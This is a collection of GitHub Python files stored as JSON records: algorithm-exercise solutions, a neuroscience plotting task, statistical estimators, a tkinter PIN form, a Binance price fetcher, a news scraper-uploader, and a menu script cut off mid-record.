{"seq_id":"26055268254","text":"# Sum of two arrays # B_2143\n# Same problem as Subsequence Sum 2\n# Subsequence Sum 2 # B_1208\n# Meet in the middle / see the course notes\n# With N items, split them into M=N/2 and N-M items and compute each half to reduce the time complexity\nfrom collections import Counter\n\ngoal = int(input())\n\nn = int(input())\na = list(map(int, input().split()))\n\nm = int(input())\nb = list(map(int, input().split()))\n\nfirst, second = [], []\n\n# first, second: all subsequence sums that can be formed from a and b respectively\nfor i in range(n):\n    sum = 0\n    for j in range(i,n):\n        sum += a[j]\n        first.append(sum)\nfor i in range(m):\n    sum = 0\n    for j in range(i,m):\n        sum += b[j]\n        second.append(sum)\n\nfirst.sort()\nsecond.sort()\nc = Counter(second)\nans = 0\n\nfor num in first:\n    \"\"\"\n    (c[goal-num])? : goal - first element = the second element we need\n    # e.g. if goal is 5 and first = [1,1,2,3,3,4,4],\n    # then 5-1 = 4, so count how many 4s are in the second list to reach 5\n    \"\"\"\n    ans += c[goal-num]\nprint(ans)","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[Bruteforce]/연습/[Brute_Force]두 배열의 합.py","file_name":"[Brute_Force]두 배열의 합.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"16352801498","text":"from logging import getLogger\nfrom typing import Sequence\n\nfrom matplotlib.axes import Axes\nfrom numpy import ones, stack\n\nfrom sharp.config.load import config\nfrom sharp.data.files.figure import FigureTarget\nfrom sharp.data.hardcoded.style import paperfig, readable\nfrom sharp.data.types.aliases import subplots\nfrom sharp.data.types.signal import Signal\nfrom sharp.data.types.split import TrainTestSplit\nfrom sharp.tasks.plot.base import FigureMaker, plot_signal_neat\nfrom sharp.tasks.plot.paper import output_dir, rm, sweepers, colors, get_tes\nfrom sharp.tasks.plot.util.annotations import add_segments, add_event_arrows\nfrom sharp.tasks.plot.util.scalebar import (\n    add_time_scalebar,\n    add_voltage_scalebar,\n)\n\nlog = getLogger(__name__)\n\n\nclass PlotSignals(FigureMaker):\n    def requires(self):\n        return (rm,) + sweepers\n\n    def output(self):\n        return self.outputs\n\n    @property\n    def outputs(self) -> Sequence[FigureTarget]:\n        return [\n            FigureTarget(output_dir, f\"signals {trange[0]:.2f}\")\n            for trange in config.time_ranges\n        ]\n\n    def work(self):\n        nrows = 5\n        axheights = ones(nrows)\n        axheights[0] = 2\n        axheights[1:3] = 0.84\n        for trange, output in zip(config.time_ranges, self.outputs):\n            log.info(f\"Generating figure {output.filename}\")\n            fig, axes = subplots(\n                nrows=nrows,\n                figsize=paperfig(0.57, 0.75),\n                gridspec_kw=dict(height_ratios=axheights),\n            )\n            self.plot_input(axes[0], trange)\n            self.plot_offline(axes[1:3], trange)\n            self.plot_online(axes[3:], trange)\n            add_time_scalebar(axes[0], 200, in_layout=False, pos_along=0.56)\n            fig.tight_layout()\n            output.write(fig)\n\n    def plot_input(self, ax, trange):\n        LFP_data = stack(\n            [rm.sr_channel, rm.ripple_channel, rm.toppyr_channel], axis=1\n        )\n        LFP = Signal(LFP_data, rm.sr_channel.fs)\n        plot_sig(LFP, ax, trange)\n        add_voltage_scalebar(ax)\n        # add_segs(ax, rm.output().read())\n\n    def plot_offline(self, axes, trange):\n        ax_SW = axes[0]\n        ax_ripple = axes[1]\n        plot_sig(rm.SW_envelope, ax_SW, trange)\n        plot_sig(rm.ripple_envelope, ax_ripple, trange, tight_ylims=True)\n        add_voltage_scalebar(ax_SW, pos_along=0.34)\n        add_voltage_scalebar(ax_ripple, 100, pos_along=0.07)\n        add_segs(ax_SW, rm.calc_SW_segments())\n        add_segs(ax_ripple, rm.calc_ripple_segments())\n\n    def plot_online(self, axes, trange):\n        for i, (sweeper, te, color) in enumerate(\n            zip(sweepers, get_tes(), colors)\n        ):\n            ax: Axes = axes[i]\n            plot_sig(sweeper.envelope_maker.envelope, ax, trange, color=color)\n            ax.hlines(\n                te.threshold,\n                *trange,\n                linewidths=0.3 * readable[\"lines.linewidth\"],\n            )\n            add_event_arrows(ax, te.correct_detections, color=\"green\")\n            add_event_arrows(ax, te.incorrect_detections, color=\"red\")\n            add_segs(ax, rm.output().read())\n\n\ndef plot_sig(sig, ax, trange, **kwargs):\n    plot_signal_neat(test_part(sig), trange, ax=ax, **kwargs)\n\n\ndef add_segs(ax, segs):\n    add_segments(ax, test_part(rm.sr_channel, segs), color=\"grey\")\n\n\ndef test_part(sig, segs=None):\n    if segs is None:\n        return TrainTestSplit(sig).signal_test\n    else:\n        return TrainTestSplit(sig, 
segs).segments_test\n","repo_name":"tfiers/sharp","sub_path":"sharp/tasks/plot/paper/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"73884304748","text":"#https://www.e-olymp.com/uk/submissions/7375203\n\nclass Node():\n def __init__(self, item):\n self.item = item\n self.next = None\n\nclass Stack():\n def __init__(self):\n self.top_node = None\n self.currentSize = 0\n\n def empty(self):\n return self.top_node is None\n\n def push(self, item):\n node = Node(item)\n\n if not self.empty():\n node.next = self.top_node\n\n self.top_node = node\n self.currentSize += 1\n\n return 'ok'\n\n def back(self):\n if self.empty():\n return 'error'\n else:\n return self.top_node.item\n\n def pop(self):\n if self.empty():\n return 'error'\n else:\n current_top = self.top_node\n item = current_top.item\n self.top_node = current_top.next\n self.currentSize -= 1\n del current_top\n return item\n\n def size(self):\n return self.currentSize\n\n def clear(self):\n self.currentSize = 0\n\n while not self.top_node is None:\n current_top = self.top_node\n self.top_node = current_top.next\n del current_top\n\n return 'ok'\n\n def exit(self):\n return 'bye'\n\n def execute(self, command):\n if command.startswith('push'):\n return self.push(command[5:])\n else:\n return getattr(self, command)()\n\nif __name__ == '__main__':\n stack = Stack()\n\n with open('input.txt') as input:\n with open('output.txt', 'w') as output:\n for line in input:\n result = stack.execute(line.rstrip())\n print(result, file=output)\n\n if result == 'bye':\n break","repo_name":"Invalid-coder/Data-Structures-and-algorithms","sub_path":"Linear_structures/Stack/Tasks/eolymp(6124).py","file_name":"eolymp(6124).py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70604526507","text":"from bs4 import BeautifulSoup\nimport urllib.request\n\nnumber_of_pages = 10\nrandomize_link = 'https://www.wikihow.com/Special:Randomizer'\n\nfor i in range(number_of_pages):\n http_doc = urllib.request.urlopen(randomize_link).read()\n soup = BeautifulSoup(http_doc)\n\n","repo_name":"frasmataz/ml101","sub_path":"wikihow-image-scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6822486489","text":"import numpy as np\nfrom numba import njit\nfrom sklearn.metrics.pairwise import euclidean_distances\n\n\n#####################\n# #\n# MoM Estimator #\n# #\n#####################\n\ndef partition_blocks(X, K):\n \"\"\"Partition X into K disjoint blocks as large as possible\n \"\"\"\n # get largest block size (should be at least 1)\n n = len(X)\n B = n // K\n if B == 0:\n raise ValueError(\"Invalid number of blocks %s, \"\n \"larger than number of samples %s\" % (K, n))\n\n # create and return blocks (plus block size)\n np.random.shuffle(X)\n X = X[:K * B]\n blocks = np.array(np.split(X, K))\n\n return blocks, B\n\n\ndef MoM(X, K):\n \"\"\"Compute mom estimate with K blocks\n \"\"\"\n blocks, _ = partition_blocks(X, K)\n means = np.mean(blocks, axis=1)\n mom = np.median(means)\n\n return mom\n\n\n#######################\n# #\n# MoRM Estimators #\n# #\n#######################\n\n@njit\ndef swor(n, p):\n \"\"\"Efficient SWoR\n \"\"\"\n idx = np.zeros(p, dtype=np.int32)\n mask = np.ones(n, 
dtype=np.bool_)\n count = 0\n\n while count < p:\n i = np.random.randint(low=0, high=n)\n if mask[i]:\n mask[i] = 0\n idx[count] = i\n count += 1\n\n return idx\n\n\ndef swor_blocks(X, K, B):\n \"\"\"Sample K SWoR blocks of size B from X\n \"\"\"\n n, d = X.shape\n blocks = np.zeros((K, B, d))\n\n for k in range(K):\n idx = swor(n, B)\n blocks[k, :, :] = X[idx, :]\n\n return blocks\n\n\n@njit\ndef mc(n, p):\n \"\"\"Efficient MC\n \"\"\"\n idx = np.zeros(p, dtype=np.int32)\n for i in range(p):\n idx[i] = np.random.randint(low=0, high=n)\n return idx\n\n\ndef mc_blocks(X, K, B):\n \"\"\"Sample K MC blocks of size B from X\n \"\"\"\n n, d = X.shape\n blocks = np.zeros((K, B, d))\n\n for k in range(K):\n idx = mc(n, B)\n blocks[k, :, :] = X[idx, :]\n\n return blocks\n\n\ndef MoRM(X, K, B, sampling='SWoR'):\n \"\"\"Compute morm estimate with K blocks of size B\n \"\"\"\n if sampling == 'SWoR':\n blocks = swor_blocks(X, K, B)\n elif sampling == 'MC':\n blocks = mc_blocks(X, K, B)\n\n means = np.mean(blocks, axis=1)\n morm = np.median(means)\n\n return morm\n\n\n###############################\n# #\n# Mo(I)U-stats Estimators #\n# #\n###############################\n\ndef u_mat(X, kernel='squared_norm'):\n \"\"\"Compute comparison matrix from specified kernel\n To modify in order to allow for more kernels\n \"\"\"\n if kernel == 'squared_norm':\n M = euclidean_distances(X)\n M **= 2\n M /= 2\n\n # elif kernel == 'my_kernel':\n # M = my_kernel(X)\n\n return M\n\n\ndef ustat_c(X, kernel='squared_norm'):\n \"\"\"Compute complete Ustat from specified kernel\n \"\"\"\n n = len(X)\n M = u_mat(X, kernel=kernel)\n U = M.sum() - np.trace(M)\n U /= n * (n - 1)\n return U\n\n\ndef MoCU(X, K, kernel='squared_norm', sampling='partition', B=10):\n \"\"\"Compute mocu estimate from specified kernel\n \"\"\"\n # sample blocks\n if sampling == 'partition':\n blocks, B = partition_blocks(X, K)\n if B < 2:\n raise ValueError(\"Invalid number of blocks %s, \"\n \"less than 2 samples per block\")\n elif sampling == 'SWoR':\n blocks = swor_blocks(X, K, B)\n elif sampling == 'MC':\n blocks = mc_blocks(X, K, B)\n\n # compute complete ustats and return mocu\n Ustats = np.zeros(K)\n for k, block in enumerate(blocks):\n Ustats[k] = ustat_c(block, kernel=kernel)\n mocu = np.median(Ustats)\n\n return mocu\n\n\ndef u_vec(X1, X2, kernel='squared_norm'):\n \"\"\"Compute comparison vector from specified kernel\n To modify in order to allow for more kernels\n \"\"\"\n if kernel == 'squared_norm':\n Y = X1 - X2\n v = np.linalg.norm(Y, axis=1)\n v **= 2\n v /= 2\n\n # elif kernel == 'my_kernel':\n # v = my_kernel(X1, X2)\n\n return v\n\n\ndef ustat_i(X1, X2, kernel='squared_norm'):\n \"\"\"Compute incomplete Ustat based on X1 and X2 and specified kernel\n \"\"\"\n v = u_vec(X1, X2, kernel=kernel)\n U = np.mean(v)\n return U\n\n\ndef pix_to_dix(k, n):\n \"\"\"Transform an index on the pairs (from 0 to n(n-1) - 1) into the double\n index of the corresponding pair (with symmetry)\n \"\"\"\n # standard transformation\n i = k // (n - 1)\n j = k % (n - 1)\n # to remove diagonal\n c0 = i < n - 1\n c1 = j >= i\n j += c0 * c1\n return i, j\n\n\ndef MoIU(X, K, B, kernel='squared_norm', sampling='SWoR'):\n \"\"\"Compute moiu estimate from specified kernel\n \"\"\"\n n = len(X)\n Ustats = np.zeros(K)\n\n for k in range(K):\n if sampling == 'SWoR':\n p_idxs = swor(n * (n - 1), B)\n elif sampling == 'MC':\n p_idxs = mc(n * (n - 1), B)\n\n d_idxs = np.array(pix_to_dix(p_idxs, n))\n\n X1 = X[d_idxs[0, :]]\n X2 = X[d_idxs[1, :]]\n\n Ustats[k] = 
ustat_i(X1, X2)\n\n moiu = np.median(Ustats)\n\n return moiu\n","repo_name":"plaforgue/morm","sub_path":"morm/morm.py","file_name":"morm.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40268625690","text":"from tkinter import*\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\nimport random\r\nimport string\r\n\r\ndef mainwindow() :\r\n root=Tk()\r\n x = root.winfo_screenwidth()/2 - w/2\r\n y = root.winfo_screenheight()/2 - h/2\r\n root.geometry(\"%dx%d+%d+%d\"%(w,h,x,y))\r\n root.config(bg='#a90432')\r\n root.title(\"Agentask\")\r\n root.option_add('*font','Garamond 20 bold')\r\n return root\r\n\r\ndef createconnection() :\r\n global conn,cursor\r\n conn = sqlite3.connect('agentask.db')\r\n cursor = conn.cursor()\r\n\r\ndef changepin(root) :\r\n global oldp_ent,newp_ent,cfnewp_ent\r\n root.title(\"Change Pin\")\r\n changepin_frm=Frame(root,bg='#a90432')\r\n changepin_frm.pack()\r\n changepin_frm.columnconfigure((0,1),weight=1)\r\n changepin_frm.rowconfigure((0,8),weight=2)\r\n changepin_frm.rowconfigure((1,2,3,4,5,6,7),weight=1)\r\n \r\n Label(changepin_frm,text=\"Old Pin :\",bg='#a90432',).grid(row=1,column=0,sticky='w',padx=10,pady=10)\r\n oldp_ent=Entry(changepin_frm,width=20)\r\n oldp_ent.grid(row=2,column=0,columnspan=2,pady=10)\r\n Label(changepin_frm,text=\"New Pin :\",bg='#a90432',).grid(row=3,column=0,sticky='w',padx=10,pady=10)\r\n newp_ent=Entry(changepin_frm,width=20,show='*')\r\n newp_ent.grid(row=4,column=0,columnspan=2,pady=10)\r\n Label(changepin_frm,text=\"Confirm Pin :\",bg='#a90432',).grid(row=5,column=0,sticky='w',padx=10,pady=10)\r\n cfnewp_ent=Entry(changepin_frm,width=20,show='*')\r\n cfnewp_ent.grid(row=6,column=0,columnspan=2,pady=10)\r\n \r\n Button(changepin_frm,text=\"Apply\",width=10,font='Garamond 16 bold').grid(row=7,column=0,pady=10)\r\n Button(changepin_frm,text=\"Cancel\",width=10,font='Garamond 16 bold').grid(row=7,column=1,pady=10)\r\n \r\ndef forgetpin(root) :\r\n global forget_frm\r\n root.title(\"Forget Pin\")\r\n forget_frm=Frame(root,bg='#a90432')\r\n forget_frm.pack()\r\n forget_frm.columnconfigure((0,1,2),weight=1)\r\n forget_frm.rowconfigure((0,1,2,3),weight=1)\r\n \r\n Label(forget_frm,text=\"Forget your pin?\",bg='#a90432',).grid(row=0,column=0,columnspan=3,padx=10,pady=20)\r\n Label(forget_frm,text=\"Enter your birth day to recieve new password\",font='Garamond 15',bg='#a90432',).grid(row=1,column=0,columnspan=3,padx=10,pady=20)\r\n bday_spin=Spinbox(forget_frm,width=10,from_=1,to=31)\r\n bday_spin.grid(row=2,column=0,sticky='e',padx=10)\r\n bmonth_spin=Spinbox(forget_frm,width=10,from_=1,to=12)\r\n bmonth_spin.grid(row=2,column=1,padx=10)\r\n byear_spin=Spinbox(forget_frm,width=10,from_=1951,to=2021,textvariable=yearspy)\r\n byear_spin.grid(row=2,column=2,sticky='w',padx=10)\r\n \r\n Button(forget_frm,text=\"Apply\",width=10,font='Garamond 16 bold',command=randompin).grid(row=3,column=0,columnspan=3,pady=30)\r\n \r\ndef randompin() :\r\n forget_frm.destroy()\r\n \r\n random_frm=Frame(root,bg='#a90432')\r\n random_frm.pack()\r\n random_frm.columnconfigure(0,weight=1)\r\n random_frm.rowconfigure(0,weight=2)\r\n random_frm.rowconfigure((1,2),weight=1)\r\n \r\n Label(random_frm,text=\"Here's your temporary pin!\",bg='#a90432').grid(row=0,column=0,sticky='news',pady=30)\r\n random_pin= ''.join(random.choice(string.ascii_uppercase + string.digits) for i in range(6))\r\n Label(random_frm,text=random_pin,bg='#a90432',font='Garamond 30 
    Label(random_frm,text=random_pin,bg='#a90432',font='Garamond 30 bold').grid(row=1,column=0,sticky='news',pady=30)\r\n    Button(random_frm,text=\"OK\",width=10,font='Garamond 16 bold').grid(row=2,column=0,sticky='news',pady=30)\r\n\r\nw=600\r\nh=700\r\nroot=mainwindow()\r\n#changepin(root)\r\nyearspy=IntVar()\r\nyearspy.set(2021)\r\n#forgetpin(root)\r\n\r\nroot.mainloop()\r\n","repo_name":"SakchaiSaehoei/CS311_final_project","sub_path":"change_forgetpin.py","file_name":"change_forgetpin.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35008586338","text":"from binance import Client, ThreadedWebsocketManager, ThreadedDepthCacheManager\nimport pandas as pd\nimport json\nfrom datetime import datetime\nimport Api_code\nimport time\nimport mplfinance as mpf\n\n#################### BINANCE API VARIABLES#####################\napi_key = Api_code.api_key\n\napi_secret = Api_code.api_secret\n\nclient = Client(api_key, api_secret)\n###############################################################\n\nclass Get_info:\n\n    def __init__(self, coinname, interval, startdate, dataframe=None):\n        '''\n        format examples:\n        coinname format = \"BTCUSDT\"\n        interval format = \"1m\"\n        fromtime format = 2020-06-06\n        '''\n        self.coinname = coinname\n        self.interval = interval\n        self.startdate = startdate\n        # avoid the mutable-default-argument pitfall\n        self.dataframe = dataframe if dataframe is not None else []\n\n############################################\n    Client.KLINE_INTERVAL_1MONTH = \"1M\"\n    Client.KLINE_INTERVAL_1WEEK = \"1w\"\n    Client.KLINE_INTERVAL_1DAY = \"1d\"\n    Client.KLINE_INTERVAL_12HOUR = \"12h\"\n    Client.KLINE_INTERVAL_6HOUR = \"6h\"\n    Client.KLINE_INTERVAL_4HOUR = \"4h\"\n    Client.KLINE_INTERVAL_2HOUR = \"2h\"\n    Client.KLINE_INTERVAL_1HOUR = \"1h\"\n    Client.KLINE_INTERVAL_30MINUTE = \"30m\"\n    Client.KLINE_INTERVAL_15MINUTE = \"15m\"\n    Client.KLINE_INTERVAL_5MINUTE = \"5m\"\n    Client.KLINE_INTERVAL_3MINUTE = \"3m\"\n    Client.KLINE_INTERVAL_1MINUTE = \"1m\"\n############################################\n    def df(self):\n\n        from_time = int(datetime.strptime(self.startdate, \"%Y-%m-%d\").timestamp()*1000)\n\n        self.dataframe = pd.DataFrame(client.get_historical_klines(self.coinname, self.interval, from_time))\n        self.dataframe.columns = [\"Opentime\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\",\"CloseTime\",\"QuoteAssetTime\",\"NumberOfTrades\",\"VolumeOver24HourPeriod\",\"PriceOver24HourPeriod \",\"Ignore\"]\n        columns_to_float = [\"Open\",\"High\",\"Low\",\"Close\",\"Volume\",\"NumberOfTrades\"]\n        self.dataframe[columns_to_float] = self.dataframe[columns_to_float].astype(float)\n        self.dataframe.drop([\"Ignore\",\"QuoteAssetTime\",\"VolumeOver24HourPeriod\",\"PriceOver24HourPeriod \"],axis=1,inplace=True)\n        self.dataframe[\"Opentime\"] = pd.to_datetime(self.dataframe[\"Opentime\"]/1000,unit=\"s\")\n        self.dataframe[\"CloseTime\"] = pd.to_datetime(self.dataframe[\"CloseTime\"]/1000,unit=\"s\")\n\n        return self.dataframe\n\n    def current_price(self):\n        return client.get_margin_price_index(symbol=self.coinname)[\"price\"]\n\n    def show_graph(self,a,b):\n        Get_info.df(self)\n        return mpf.plot(self.dataframe.set_index(\"CloseTime\"),type=\"line\",style=\"charles\",mav=(a,b),volume=True)\n\n\na = Get_info(coinname=\"ETHUSDT\",interval=
\"5min\",startdate=\"2022-06-06\")\nprint(a.df())\n\nprint(a.current_price())\n\nprint(a.show_graph(20,50))\n\n###TESTING","repo_name":"alamgirhossein041/Pytrade","sub_path":"Get_coin_info.py","file_name":"Get_coin_info.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15349372317","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: the king\n@project: zyl_company\n@file: download.py\n@time: 2022/4/21 14:17\n\"\"\"\nimport hashlib\nimport json\nimport os\nimport shutil\nfrom multiprocessing.pool import ThreadPool\nfrom os import path\n\nimport requests\nfrom pymongo import MongoClient\nfrom pymongo.errors import DuplicateKeyError\nfrom common.log_out import log_err, log\nfrom .config import ARTICLEUPLOAD, MONGO_URI, MONGO_DB\n\nclient = MongoClient(MONGO_URI)\nurl_coll = client[MONGO_DB][\"urls\"]\narticle_coll = client[MONGO_DB][\"articles\"]\nrequests.packages.urllib3.disable_warnings()\n\npicHeaders = {\n 'accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Host': '27.150.182.135:8855',\n 'Origin': 'http://8.129.215.170:8855',\n 'Pragma': 'no-cache',\n 'Referer': 'http://8.129.215.170:8855/swagger-ui.html',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\nvideoPageHeaders = {\n 'authority': 'v.jin10.com',\n 'method': 'GET',\n 'path': '/details.html?id=12574',\n 'scheme': 'https',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'cache-control': 'no-cache',\n 'pragma': 'no-cache',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\nvideoUploadHeaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Pragma': 'no-cache',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\narticleHeaders = {\n 'accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Content-Length': '532',\n 'Content-Type': 'application/json',\n 'Host': '8.129.215.170:8855',\n 'Origin': 'http://8.129.215.170:8855',\n 'Pragma': 'no-cache',\n # 'Referer': 'http://8.129.215.170:8855/swagger-ui.html',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\nserverUrl = 'https://zuiyouliao-prod.oss-cn-beijing.aliyuncs.com/zx/image/'\nvideoServerUrl = 'http://qiniu.zuiyouliao.com/video/upload/'\npic_info = {'id': 0, 'pic_type': 3}\nimage_base_path = path.dirname(os.path.abspath(path.dirname(__file__)))\n\n# 下载/上传 图片/视频 函数\ndef DownloadPicture_Video(img_path, img_info, retry=0):\n img_url = img_info[1]\n try:\n if not str(img_url).startswith(\"http\"):return\n res = requests.get(img_url, timeout=60)\n if 
        if not str(img_url).startswith(\"http\"):\n            return None\n        res = requests.get(img_url, timeout=60)\n        if res.status_code == 200:\n            basename = hashlib.md5(img_url.encode(\"utf8\")).hexdigest() + '.jpg'\n            filename = os.path.abspath(os.path.join(img_path + '/' + basename))\n            with open(filename, \"wb\") as f:\n                content = res.content\n                f.write(content)\n\n            # upload picture\n            uploadUrl = 'http://27.150.182.135:8855/api/common/upload?composeId={0}&type={1}&isNameReal=0'.format(\n                pic_info['id'], pic_info['pic_type'])\n\n            files = {\n                'file': (basename, open(filename, 'rb'), 'image/jpg')\n            }\n            picHeaders.update({\n                'Content-Length': str(os.path.getsize(filename))\n            })\n\n            try:\n                resp = requests.post(url=uploadUrl, headers=picHeaders, files=files, timeout=60)\n                if resp.json().get('message') == '携带数据成功':\n                    return_url = 'https://zuiyouliao-prod.oss-cn-beijing.aliyuncs.com' + resp.json().get('entity')['filePath']\n                    print(f\"id {pic_info['id']} *** type {pic_info['pic_type']} *** download image successfully:{img_url} *** upload {return_url}\")\n                    img_info.append(return_url)\n\n                    return img_info\n                else:\n                    log_err(resp.json())\n            except requests.exceptions.ConnectionError:\n                log(f'network problem while uploading the image to the server, retrying... {img_url}')\n                if retry < 3:\n                    return DownloadPicture_Video(img_path, img_info, retry + 1)\n                else:\n                    log_err(f'image upload to the server failed after three retries {img_url}')\n            except Exception as error:\n                log_err(error)\n                log_err(uploadUrl)\n    except requests.exceptions.ConnectionError:\n        print(f'network problem while downloading the image, retrying... {img_url}')\n        if retry < 3:\n            return DownloadPicture_Video(img_path, img_info, retry + 1)\n    except Exception as error:\n        log_err(error)\n        return None\n    return None\n\n\n# process the downloads with a thread pool\ndef command_thread(company_name, image_list, Async=True):\n    file_path = os.path.abspath(image_base_path + f'/download_data/{company_name}')\n    if not os.path.exists(file_path):\n        os.makedirs(file_path)\n\n    thread_list = []\n    # set the number of worker threads\n    pool = ThreadPool(processes=8)\n\n    for img_info in image_list:\n        print(f'------------------ {img_info}')\n        if Async:\n            out = pool.apply_async(func=DownloadPicture_Video, args=(file_path, img_info,))  # asynchronous\n        else:\n            out = pool.apply(func=DownloadPicture_Video, args=(file_path, img_info,))  # synchronous\n        thread_list.append(out)\n        # break\n    pool.close()\n    pool.join()\n\n    # collect the results\n    com_list = []\n    if Async:\n        for p in thread_list:\n            com = p.get()  # get() blocks until the task finishes\n            com_list.append(com)\n    else:\n        com_list = thread_list\n    com_list = [i for i in com_list if i is not None]\n\n    # remove the temporary download folder\n    shutil.rmtree(file_path, True)\n\n    return com_list\n\n\n# upload an article\ndef UploadArticle(dataJson: dict):\n    try:\n        if '验证码' not in str(dataJson.get('content')) and '验证码' not in str(dataJson.get('cssHtml')):\n            resp = requests.post(url=ARTICLEUPLOAD, headers=articleHeaders, data=json.dumps(dataJson), timeout=60)\n            if resp.json().get('ok'):\n                print(\"article id {0} *** upload Article successfully *** upload status {1}\".format(dataJson.get('id'), resp.json().get('code')))\n\n                # back up the record and mark it as uploaded\n                url_coll.update_one({'hash_key': dataJson.get('id')}, {\"$set\":{'hash_key': dataJson.get('id'), 'status': 1}}, upsert=True)\n                try:\n                    article_coll.insert_one(dataJson)\n                except DuplicateKeyError:\n                    pass\n            elif resp.json().get('status') == 500 and 'DuplicateKey' in resp.json().get('exception'):\n                pass\n            elif resp.json().get('status') == 500 and resp.json().get('error') == 'Internal Server Error':\n                try:\n                    print(resp.json())\n                    url_coll.update_one({'hash_key': dataJson.get('id')}, {\"$set\":{'hash_key': dataJson.get('id'), 'status': 500}}, upsert=True)\n                except:\n                    pass\n            else:\n                print(resp.json(), json.dumps(dataJson))\n        else:\n            print('--- captcha text detected in the article body, skipping upload ---')\n            return\n    except requests.exceptions.ConnectionError:\n
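        # transient network failure while POSTing the article: retry recursively (note: unlike the image path, there is no retry cap here)\n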
        print('network problem while uploading the article, retrying...')\n        return UploadArticle(dataJson)\n    except Exception as error:\n        log_err(error)\n","repo_name":"zhq910513/NewsSearch-0519","sub_path":"common/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":7996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"31977279139","text":"from Bio import SeqIO\nfrom itertools import product\nimport re\n\n#dna = SeqIO.read(\"rosalind_sample.txt\", \"fasta\").seq\ndna = SeqIO.read(\"rosalind_orf.txt\", \"fasta\").seq\n\nwith open(\"rosalind_orf_result.txt\", \"w\") as output:\n    orfs = []\n    # check both strands and their frames\n    for strand, frame in product([dna, dna.reverse_complement()], range(3)):\n        # get full translation\n        proteic_seq = str(strand[frame:].translate())\n        # get ORFs, all regions starting with \"M\" and ending with \"*\"\n        matches = re.findall('(?=(M.*?)\\\*)', proteic_seq)\n        #if matches:\n        for match in matches:\n            orfs.append(match)\n\n    # use set to get distinct sequence as specified\n    print(\"\\n\".join(set(orfs)), file=output)\n","repo_name":"dpflieger/Rosalind","sub_path":"Bioinformatics_stronghold/15_ORF/ORF.py","file_name":"ORF.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"19354741879","text":"d={ \"1\": \"Pizza - 50rs\",\r\n    \"2\": \"Burger - 40rs\",\r\n    \"3\": \"Maggie - 30rs\",\r\n    \"4\": \"Paties - 20rs\"}\r\nfor i in d:\r\n    print(i+')', d[i])\r\n\r\nprint()\r\nfinal=[]\r\n\r\nl1=[0,1,2,3,4]\r\nl2=[\"Thank you\",\"Pizza\",\"Burger\",\"Maggie\",\"Paties\"]\r\nprice=[0,50,40,30,20]\r\n\r\np=1\r\nwhile p>0:\r\n    t=int(input(\"Enter your Table Number: \"))\r\n    x=int(input(\"Enter Dish Number: \"))\r\n    for i in l1:\r\n        if x>0:\r\n            if i==x:\r\n                a=(l2[i])\r\n                print(a)\r\n                final.append(a)\r\n                print(\"Nice Choice!
